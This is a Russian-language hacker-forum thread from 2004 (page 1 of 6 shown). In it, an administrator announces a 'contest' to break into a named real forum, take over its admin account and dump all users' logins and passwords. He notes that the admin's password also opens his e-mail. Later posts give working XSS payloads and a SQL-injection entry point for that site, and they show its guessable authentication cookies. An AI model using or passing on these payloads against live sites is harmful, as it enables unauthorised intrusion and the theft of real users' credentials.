HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
Перезагрузить страницу Конкурс: поимей препода
   
Ответ
Страница 1 из 6 1 2 3 4 5 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

Конкурс: поимей препода
  #1  
Старый 26.12.2004, 12:17
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,084
С нами: 11893346

Репутация: 45


Lightbulb Конкурс: поимей препода
Конкурс: поимей препода

Вчера с Егором за фигню угарали и нашли очень примитивный форум с очень примитивной защитой (хотя само понятие слова "защита" тут не употребимо) ...

В общем есть форум http://prepod.km.ru/forum/index.php

Вы там регистрируетесь, находите "уязвимость", авторизируетесь под админом и в админке выдираете из БД форума все логины и пароли зарегистрированных юзеров ...

Примичание: пароль к аккаунту администратора на форуме совпадает с паролем на e-mail ...

Кто первый с этим справится и отпишется тут, тот получит собственный статус на форуме

Конкурс детский, так что призы тоже детские ...
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 26.12.2004, 13:54
SHiTS
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
С нами: 11269766

Репутация: 39
По умолчанию
один вопрос от начинающего хацкера-надо в html копаться или использовать id?
 
Ответить с цитированием

  #3  
Старый 26.12.2004, 14:12
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,084
С нами: 11893346

Репутация: 45


По умолчанию
На форуме есть xss в теге [img]
Код HTML:
    [img]javascript:alert(document.cookie);[/img]
+ еще xss в поиске:
Код:
  http://prepod.km.ru/forum/search.php?text_poisk=%3Cscript%3Ejavascript:alert();%3C/script%3E
Тут куки даже на сниффер высылать не надо ...
К тому же можно было покопаться с http://prepod.km.ru/forum/forum_tems.php?t=1&cat='
Но тут все гораздо проще ...
Последний раз редактировалось Че Гевара; 27.12.2004 в 17:43..
 
Ответить с цитированием

  #4  
Старый 26.12.2004, 14:20
SHiTS
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
С нами: 11269766

Репутация: 39
По умолчанию
не,тут я не силен
 
Ответить с цитированием

  #5  
Старый 26.12.2004, 14:27
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
С нами: 11272646

Репутация: 1384


По умолчанию
lol - ну и система аутентификации ))))
2Shits тебе не советовал бы по форуму лазить, когда там админ сидит,
темболее называясь грозным именем Hacker(SHiTS)
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

  #6  
Старый 26.12.2004, 14:33
SHiTS
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
С нами: 11269766

Репутация: 39
По умолчанию
да пофиг,лучше скажи как пассы узнать!
я че-то где-то когда-то смотрел,по моему padonak.ru или .net ломали через куку
а тут че делать?
 
Ответить с цитированием

  #7  
Старый 26.12.2004, 14:35
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
С нами: 11272646

Репутация: 1384


По умолчанию
Да млин элементарнее не может быть, вот только админ свалит Ж)
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием

  #8  
Старый 26.12.2004, 14:37
SHiTS
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
С нами: 11269766

Репутация: 39
По умолчанию
все вы такие...
 
Ответить с цитированием

  #9  
Старый 26.12.2004, 14:38
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,084
С нами: 11893346

Репутация: 45


По умолчанию
Ну блин ... Тут они еще думают ...
madnet
Ты то хоть прошел конкурс ? )
 
Ответить с цитированием

  #10  
Старый 26.12.2004, 14:41
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
С нами: 11272646

Репутация: 1384


По умолчанию
Странноватые cookies
board_user_cook=belo4ka
board_user_id=9
а у админа как не странно
board_user_cook=prepod
board_user_id=1
Гы
__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
 
Ответить с цитированием
Ответ
Страница 1 из 6 1 2 3 4 5 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.